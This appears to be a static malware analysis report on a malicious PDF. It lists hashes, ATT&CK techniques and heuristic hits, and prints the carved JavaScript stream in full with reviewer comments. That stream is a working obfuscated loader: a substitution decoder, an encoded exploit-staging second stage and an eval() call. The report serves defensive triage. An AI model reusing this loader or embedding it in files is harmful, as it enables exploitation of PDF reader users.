Malicious PDF / .TXT — malware analysis report

Static analysis result for SHA-256 871a48d74d0fd1ba…

MALICIOUS

PDF / .TXT

9.2 KB Created: 2010-05-10 05:12:34 Authoring application: fCWnNtO (via Uz8pGpf) First seen: 2026-05-11
MD5: 9ae372d1ec2c9f8e632431da150313b5 SHA-1: 3ea111db225039a64dd6c014fd02b8c64b571aa5 SHA-256: 871a48d74d0fd1ba17d04f64582176d11bfcfee86e6c52650764abcf31a531e6
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript that is heavily obfuscated, and it matched the "PDF JavaScript exploit cluster" heuristic (PDF_JS_EXPLOIT_CLUSTER). The ML classifier also scores the sample as malicious. Taken together, the obfuscation and the exploit-cluster match indicate the script is designed to execute malicious code, likely downloading a secondary payload; that download stage is inferred from static indicators rather than observed.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    g)FwrAqxYKWidEntHOpF=FL57LLLLL;\nFF(g)FJ94<WL3kZEvJbmV{F=FR5EgbNzKYTv8bRAecYC9ObrF*Fi;\nFF(g)FDfYKznJBk,Za,9roF=FwrAqxYKWidEntHOpF-FlJ94<WL3kZEvJbmV{F+FL5,jX;\nFF(g)F<<Lp>K>WD4w>eyo3F=Fv9CK8gqCl\"%v L L%v L L\"X;\nFF<<Lp>K>WD4w>eyo3F=FousAN5HZ{>NHb6fsl<<Lp>K>WD4w>eyo31FDfYKznJBk,Za,9roX;\nFF(g)Fud0O}SniQJdCuv)LF=FlT2jnt4n,}Tega)SmF-FL57LLLLLXF/FwrAqxYKWidEntHOp;\nFFV4)Fl(g)FsV0pqCxDYyQCbd<>F=FL;FsV0pqCxDYyQCbd<>FPFud0O}SniQJdCuv)L;FsV0pqCxDYyQCbd<>F++FXM\nFFFFrToYuBy)rO{J44T([sV0pqCxDYyQCbd<>]F= …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23A 7999 bytes
SHA-256: 1290908f4e0644e11a376fdc40c9ce442958a00f2b6ef7203d6e6f124c73f161
Detection
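ClamAV: No threats found (signature scan of the carved script only; this result does not override the heuristic and ML findings above)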
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 111 of 151 identifiers look randomly generated (e.g. 'nFFFFFFFF2rGYCFlewye8BKmo0BKD4YrcYC9ObrF') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
/*
 * Carved PDF /JS stream, shown as an analysis exhibit. The code below is
 * unchanged; only review comments were added. The short slash-star comments
 * with random-looking text are part of the sample itself.
 *
 * Structure visible in this listing:
 *   1. bHuUug(str, i)   - returns the one-character substring of str at index i.
 *   2. eA6wEY0ke(ch)    - single-character substitution lookup between two
 *                         71-character alphabets.
 *   3. Z6Durk0cu        - the encoded second-stage script text.
 *   4. final loop, eval - decodes Z6Durk0cu one character at a time into
 *                         jFSnfzEVf5EyoM7y and passes the result to eval().
 *
 * Applying the lookup table to the encoded text by hand (no execution) yields
 * readable Acrobat JavaScript: for example "(g)" maps to "var" and "v9CK8gqC"
 * maps to "unescape". The decoded stage appears to branch on
 * app.viewerVersion and to call util.printf, Collab.collectEmailInfo and
 * Collab.getIcon after building large strings from unescape("%u...") data,
 * which is consistent with the exploit-staging indicators described by the
 * PDF_JS_EXPLOIT_CLUSTER rule.
 *
 * For static triage, capture the value of jFSnfzEVf5EyoM7y instead of letting
 * eval() run, and handle the sample only in an isolated analysis environment.
 *
 * NOTE(review): the line breaks that fall inside the Z6Durk0cu string literal
 * appear to come from the report's preview wrapping (the same data is shown
 * unbroken where it repeats); they are left exactly as displayed.
 */

/* Character accessor. The first parameter shadows the function's own name
   inside the body, so bHuUug there refers to the string argument. */
function bHuUug(bHuUug,vKKTxf) {var yvHozcJvh8Zt6O=bHuUug. substr (vKKTxf, 1);return yvHozcJvh8Zt6O;}/*VKGF1|AUb6G9dmHFa3MEtp|eMN46JI9*/
/* Substitution lookup: finds the input character in the second alphabet
   (B1Cll4BT9yVXHsGAP9HH) and returns the character at the same index in the
   first alphabet (AH2HTLlTHYYgP). A character not found in the second alphabet
   is returned unchanged. The loop counter aStuaI is never declared, so it is
   an implicit global. */
function eA6wEY0ke(Eku1ZrFwBYTXs2) {/*TGkKxgfOclO6|WBoQNtA3|eFLZCUiBz1IaC56hKZJZ*/var AH2HTLlTHYYgP = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*XvWBCkvCds[j46lOfnDXvdZr]A2zGRLeDifF*//*QIm9pL4|wIHaMeMq44G1w6|DIdHq8MyPUaPAmKmYSuz*/var B1Cll4BT9yVXHsGAP9HH /*PBLJ5SBsPAvXd[DcF2saT8b5IDUayK6DM]MIaN0qO*/= new String("P.lXMhFc1a3npdDTk<JSzefUyZH0mwxWsQAgI8{CVOrGNuYR94qo)Kbv(25B6L}i,7>tEj ");/*DrfHJlA1CUzdQ7|kYVvUY7clF2z6|DimuEu3pvusFkL*/for(aStuaI=0;aStuaI<AH2HTLlTHYYgP.length;aStuaI++) {if(Eku1ZrFwBYTXs2 == bHuUug(B1Cll4BT9yVXHsGAP9HH, aStuaI)) {/*ht66ErQdps[ul3qK6]xqThj9TU*/return bHuUug(AH2HTLlTHYYgP, aStuaI);/*Y52udmqZqYqJDZNy <GfLDu]tEgTD0ouOjn8CPpc6DIF*/}}return Eku1ZrFwBYTXs2;}/*hT5iaa[dLtNPQgSGKDUuqTx]AP2CX8J5REesfOLq7Y5N*//*NTGRo087o463x9RvIND|rvr57Y3W|GRhaYyEOw*/
/* jFSnfzEVf5EyoM7y is the (initially empty) accumulator for the decoded text;
   Z6Durk0cu holds the encoded second stage. Characters outside the lookup
   alphabet, such as the escaped newlines, quotes and "%", "=", "+", ";",
   pass through the decoder unchanged. */
var jFSnfzEVf5EyoM7y = new String;var Z6Durk0cu = new String("\n(g)FrToYuBy)rO{J44T(F=F9C2Fa))gBlX;\n(g)Fo4(IyYNo0eNB4QvR;\nVv98bG49FousAN5HZ{>NHb6fsl<<Lp>K>WD4w>eyo31FDfYKznJBk,Za,9roXM\nFF2rGYCFl<<Lp>K>WD4w>eyo3cYC9ObrF*FiFPFDfYKznJBk,Za,9roXM\nFFFF<<Lp>K>WD4w>eyo3F+=F<<Lp>K>WD4w>eyo3;\nFFh\nFF<<Lp>K>WD4w>eyo3F=F<<Lp>K>WD4w>eyo3cKvIKb)G9OlL1FDfYKznJBk,Za,9roF/FiX;\nFF)Cbv)9F<<Lp>K>WD4w>eyo3;\nh\nVv98bG49Fyo>aN O6237JgvxulQT{{m28u6,vio8K5XM\nFF(g)FT2jnt4n,}Tega)SmF=FL5L8L8L8L8;\nFF(g)FR5EgbNzKYTv8bRAeF=Fv9CK8gqCl\"%v7,7,%v7,7,%v7,7,%vLDd3%v,,>3%vttn %vjL3 %vjLL}%vdD,,%vdi7,%vd3Da%vdjL>%vDDdn%vDDDD%vj3ED%vpD7d%vdDdD%vt7dD%vd,aD%v Dt7%v7iD,%v Dt7%vtddE%vdDL,%vdDd3%vt7dD%v3 L,%vt}jE%vd}a}%vLEL,%vdD}}%vdDdD%vaatt%v3 d3%vEEjE%vt>}}%vLEd}%vdD}D%vdDdD%vaatt%v3 dE%vnajE%v}L>D%vLEip%vdDLp%vdDdD%vaatt%v3 d,%vLLjE%vLDi}%vLEjD%vdD,3%vdDdD%vaatt%v3 DD%vidjE%vLa t%vLE>E%vdDi %vdDdD%vaatt%vaDD3%vpEtD%v ain%vtt}>%vDEaa%vdjLt%vdDdd%v3}dD%v att%vt7n3%vd3aa%vddj>%vt73t%vDE3a%vLE3 %vdDt7%vdDdD%vjE3D%vD>p %v 
DnL%vEjLE%vdDdD%vttdD%vD,aa%viat7%viDtn%vtt3D%vnDaa%v}LjE%vdDdD%v3DdD%vaat7%vj>D3%v3tdp%v3at7%vLEDE%vdDjd%vdDdD%vaadn%vijnD%v3,dD%vn} }%vijja%vd3aD%vja E%vdDdD%v a}L%vt7nD%vd,aa%vddj>%vt73t%vDE3a%vaDLE%vdDdD%vj>dD%v3Edj%vaadn%vpnn3%v3n,7%v}L3n%vnD a%v3n3D%vaat7%vj>D,%v3tda%v3at7%vLEDE%vdDnn%vdDdD%vdDj>%v a}L%vt7nD%vdEaa%vdpj>%vt73t%vDE3a%vDDLE%vdDdD%vj>dD%vt7}L%vDDaa%vddj>%vt73t%vDE3a%vdDLE%vdDdD%vaddD%v3p37%vLddn%vLddn%vLddn%vLddn%vL,tn%v3>d3%vt73n%vLp,>%v3p}j%vLD}L%vt73a%vt7L,%vdE i%v3it7%v3 d,%v nt7%vt7p,%vD} 3%vdn E%v3 }n%v  t7%vdnnD%vpn}n%vatit%v7iad%vindn%vpn3 %vdL} %vDD>}%v}pp>%vdE 3%vi}id%vdndi%vaD}p%v}dL7%v}}p7%v a3}%v3>La%vL7t7%v3>t7%vdnn3%vj ,i%vd,t7%vt7a7%vD,3>%v,idn%vd3t7%vdnt7%v3}ia%vip3i%vdDdE%v}3LE%v}L}}%v3a}L%va,3p%vaLai%vdDa}%vE7tj%vELE7%viD,a%vt7iD%vtp,L%v,}t}%vE,td%vt id%vtttd%viDtD%vtnti%vtEtD%vtniD%vt}tD%vidt7%vtjEL%v,DEL%vt7t %v, ,p%vLL,}\"X;\nFFGVFlQT{{m28u6,vio8K5F==F}XM\nFFFFT2jnt4n,}Tega)SmF=FL5,L,L,L,L;\nFFFFR5EgbNzKYTv8bRAeF=Fv9CK8gqCl\"%v7,7,%v7,7,%v7,7,%vLDd3%v,,>3%vttn %vjL3 %vjLL}%vdD,,%vdi7,%vd3Da%vdjL>%vDDdn%vDDDD%vj3ED%vpD7d%vdDdD%vt7dD%vd,aD%v Dt7%v7iD,%v Dt7%vtddE%vdDL,%vdDd3%vt7dD%v3 L,%vt}jE%vd}a}%vLEL,%vdD}}%vdDdD%vaatt%v3 d3%vEEjE%vt>}}%vLEd}%vdD}D%vdDdD%vaatt%v3 dE%vnajE%v}L>D%vLEip%vdDLp%vdDdD%vaatt%v3 d,%vLLjE%vLDi}%vLEjD%vdD,3%vdDdD%vaatt%v3 DD%vidjE%vLa t%vLE>E%vdDi %vdDdD%vaatt%vaDD3%vpEtD%v ain%vtt}>%vDEaa%vdjLt%vdDdd%v3}dD%v att%vt7n3%vd3aa%vddj>%vt73t%vDE3a%vLE3 %vdDt7%vdDdD%vjE3D%vD>p %v DnL%vEjLE%vdDdD%vttdD%vD,aa%viat7%viDtn%vtt3D%vnDaa%v}LjE%vdDdD%v3DdD%vaat7%vj>D3%v3tdp%v3at7%vLEDE%vdDjd%vdDdD%vaadn%vijnD%v3,dD%vn} }%vijja%vd3aD%vja E%vdDdD%v a}L%vt7nD%vd,aa%vddj>%vt73t%vDE3a%vaDLE%vdDdD%vj>dD%v3Edj%vaadn%vpnn3%v3n,7%v}L3n%vnD a%v3n3D%vaat7%vj>D,%v3tda%v3at7%vLEDE%vdDnn%vdDdD%vdDj>%v a}L%vt7nD%vdEaa%vdpj>%vt73t%vDE3a%vDDLE%vdDdD%vj>dD%vt7}L%vDDaa%vddj>%vt73t%vDE3a%vdDLE%vdDdD%vaddD%v3p37%vLddn%vLddn%vLddn%vLddn%vL,tn%v3>d3%vt73n%vLp,>%v3p}j%vLD}L%vt73a%vt7L,%vdE i%v3it7%v3 d,%v nt7%vt7p,%vD} 3%vdn E%v3 }n%v  
t7%vdnnD%vpn}n%vatit%v7iad%vindn%vpn3 %vdL} %vDD>}%v}pp>%vdE 3%vi}id%vdndi%vaD}p%v}dL7%v}}p7%v a3}%v3>La%vL7t7%v3>t7%vdnn3%vj ,i%vd,t7%vt7a7%vD,3>%v,idn%vd3t7%vdnt7%v3}ia%vip3i%vdDdE%v}3LE%v}L}}%v3a}L%va,3p%vaLai%vdDa}%vE7tj%vELE7%viD,a%vt7iD%vtp,L%v,}t}%vE,td%vt id%vtttd%viDtD%vtnti%vtEtD%vtniD%vt}tD%vidt7%vtjEL%v,DEL%vt7t %v, ,p%vLL,}\"X;\nFFh\nFFCYKCFGVFlQT{{m28u6,vio8K5F==FiXM\nFFFFR5EgbNzKYTv8bRAeF=Fv9CK8gqCl\"%v7,7,%v7,7,%v7,7,%vLDd3%v,,>3%vttn %vjL3 %vjLL}%vdD,,%vdi7,%vd3Da%vdjL>%vDDdn%vDDDD%vj3ED%vpD7d%vdDdD%vt7dD%vd,aD%v Dt7%v7iD,%v Dt7%vtddE%vdDL,%vdDd3%vt7dD%v3 L,%vt}jE%vd}a}%vLEL,%vdD}}%vdDdD%vaatt%v3 d3%vEEjE%vt>}}%vLEd}%vdD}D%vdDdD%vaatt%v3 dE%vnajE%v}L>D%vLEip%vdDLp%vdDdD%vaatt%v3 d,%vLLjE%vLDi}%vLEjD%vdD,3%vdDdD%vaatt%v3 DD%vidjE%vLa t%vLE>E%vdDi %vdDdD%vaatt%vaDD3%vpEtD%v ain%vtt}>%vDEaa%vdjLt%vdDdd%v3}dD%v att%vt7n3%vd3aa%vddj>%vt73t%vDE3a%vLE3 %vdDt7%vdDdD%vjE3D%vD>p %v DnL%vEjLE%vdDdD%vttdD%vD,aa%viat7%viDtn%vtt3D%vnDaa%v}LjE%vdDdD%v3DdD%vaat7%vj>D3%v3tdp%v3at7%vLEDE%vdDjd%vdDdD%vaadn%vijnD%v3,dD%vn} }%vijja%vd3aD%vja E%vdDdD%v a}L%vt7nD%vd,aa%vddj>%vt73t%vDE3a%vaDLE%vdDdD%vj>dD%v3Edj%vaadn%vpnn3%v3n,7%v}L3n%vnD a%v3n3D%vaat7%vj>D,%v3tda%v3at7%vLEDE%vdDnn%vdDdD%vdDj>%v a}L%vt7nD%vdEaa%vdpj>%vt73t%vDE3a%vDDLE%vdDdD%vj>dD%vt7}L%vDDaa%vddj>%vt73t%vDE3a%vdDLE%vdDdD%vaddD%v3p37%vLddn%vLddn%vLddn%vLddn%vL,tn%v3>d3%vt73n%vLp,>%v3p}j%vLD}L%vt73a%vt7L,%vdE i%v3it7%v3 d,%v nt7%vt7p,%vD} 3%vdn E%v3 }n%v  t7%vdnnD%vpn}n%vatit%v7iad%vindn%vpn3 %vdL} %vDD>}%v}pp>%vdE 3%vi}id%vdndi%vaD}p%v}dL7%v}}p7%v a3}%v3>La%vL7t7%v3>t7%vdnn3%vj ,i%vd,t7%vt7a7%vD,3>%v,idn%vd3t7%vdnt7%v3}ia%vip3i%vdDdE%v}3LE%v}L}}%v3a}L%va,3p%vaLai%vdDa}%vE7tj%vELE7%viD,a%vt7iD%vtp,L%v,}t}%vE,td%vt id%vtttd%viDtD%vtnti%vtEtD%vtniD%vt}tD%vidt7%vtjEL%v,DEL%vt7t %v, ,p%vLL,}\"X;\nFFh\nFF(g)FwrAqxYKWidEntHOpF=FL57LLLLL;\nFF(g)FJ94<WL3kZEvJbmV{F=FR5EgbNzKYTv8bRAecYC9ObrF*Fi;\nFF(g)FDfYKznJBk,Za,9roF=FwrAqxYKWidEntHOpF-FlJ94<WL3kZEvJbmV{F+FL5,jX;\nFF(g)F<<Lp>K>WD4w>eyo3F=Fv9CK8gqCl\"%v L L%v L 
L\"X;\nFF<<Lp>K>WD4w>eyo3F=FousAN5HZ{>NHb6fsl<<Lp>K>WD4w>eyo31FDfYKznJBk,Za,9roX;\nFF(g)Fud0O}SniQJdCuv)LF=FlT2jnt4n,}Tega)SmF-FL57LLLLLXF/FwrAqxYKWidEntHOp;\nFFV4)Fl(g)FsV0pqCxDYyQCbd<>F=FL;FsV0pqCxDYyQCbd<>FPFud0O}SniQJdCuv)L;FsV0pqCxDYyQCbd<>F++FXM\nFFFFrToYuBy)rO{J44T([sV0pqCxDYyQCbd<>]F=F<<Lp>K>WD4w>eyo3F+FR5EgbNzKYTv8bRAe;\nFFh\nh\nVv98bG49FKuY0tBwC<NJ7{apzlXM\nFF(g)FqOAVSt(ExwYUG7maF=FL;\nFF(g)FQD{bdjQWo)Aw,RoKF=Fgqqc(GC2C)xC)KG49cb40b)G9OlX;\nFFgqqc8YCg)mGRCUvblo4(IyYNo0eNB4QvRX;\n\nFFGVFlQD{bdjQWo)Aw,RoKFPFEc}XM\nFFFFyo>aN O6237JgvxulLX;\nFFFF(g)FkZQ9xwb}BVyOGb)WF=Fv9CK8gqCl\"%vL8L8%vL8L8\"X;\nFFFF2rGYCFlkZQ9xwb}BVyOGb)WcYC9ObrFPF77 >iXkZQ9xwb}BVyOGb)WF+=FkZQ9xwb}BVyOGb)W;\nFFFFbrGKFc84YYgI0b4)CF=Fn4YYgIc84YYC8bdRgGY<9V4lM\nFFFFFFKvINF:F\"\"1FRKOF:FkZQ9xwb}BVyOGb)W\nFFFFh\nFFFFX;\nFFh\nGVFlQD{bdjQWo)Aw,RoKF.=F XM\nFFFFb)BFM\nGVFlgqqc{48cn4YYgIcOCb<849XM\nFFFFFFFFyo>aN O6237JgvxuliX;\nFFFFFFFF(g)Fewye8BKmo0BKD4YrF=Fv9CK8gqCl\"%L \"X;\nFFFFFFFF2rGYCFlewye8BKmo0BKD4YrcYC9ObrFPFL57LLLXewye8BKmo0BKD4YrF+=Fewye8BKmo0BKD4Yr;\nFFFFFFFFewye8BKmo0BKD4YrF=F\"fc\"F+Fewye8BKmo0BKD4Yr;\ngqqc{48cn4YYgIcOCb<849lewye8BKmo0BKD4YrX;\nFFFFFFFFqOAVSt(ExwYUG7maF=F};\nFFFFFFh\nFFFFFFCYKCFM\nFFFFFFFFqOAVSt(ExwYUG7maF=F};\nFFFFFFh\nFFFFh\nFFFF8gb8rFlCXM\nFFFFFFqOAVSt(ExwYUG7maF=F};\nFFFFh\nFFFFGVFlqOAVSt(ExwYUG7maF==F}XM\nFFFFFFGVFllQD{bdjQWo)Aw,RoKF.=FEc}&&FQD{bdjQWo)Aw,RoKFPF XXM\nFFFFFFFFyo>aN O6237Jgvxul}X;\nFFFFFFFF(g)F)SxNqyu9>LwR,z<3F=F\"}i                  \";\nFFFFFFFFV4)FlgGsHrZ(sbby r3q2F=FL;FgGsHrZ(sbby r3q2FPFiEt;FgGsHrZ(sbby r3q2F++FXM\nFFFFFFFFFF)SxNqyu9>LwR,z<3F+=F\"j\";\nFFFFFFFFh\nFFFFFFFFvbGYcq)G9bVl\"%7>LLLV\"1F)SxNqyu9>LwR,z<3X;\nFFFFFFh\nFFFFh\nFFh\nh\ngqqcVzOzuZ 4g8g85b49F=FKuY0tBwC<NJ7{apz;\no4(IyYNo0eNB4QvRF=FgqqcKCbmGRCUvbl\"gqqcVzOzuZ 4g8g85b49lX\"1F}LX;\n");/*Ar9xe{EPGSST9EB5BZyXs5oQVC}ZR1cLi*//*ACZDSgVlzVp1|qQFE9AtQV|UuEMNPvoNxEQGkmrZ*/
/* Decode-and-run step: every character of Z6Durk0cu is passed through the
   substitution lookup and appended to jFSnfzEVf5EyoM7y, then the assembled
   text is executed with eval(). This is the single point where the hidden
   stage becomes live code; vigfI is another undeclared (implicit global)
   counter. */
for(vigfI=0;vigfI<Z6Durk0cu.length;vigfI++)jFSnfzEVf5EyoM7y += 
eA6wEY0ke(bHuUug(Z6Durk0cu,vigfI));eval(jFSnfzEVf5EyoM7y);/*WRNDiSHiS1ynnJYrVl6G[K4UbA4DsU]FmOJK*/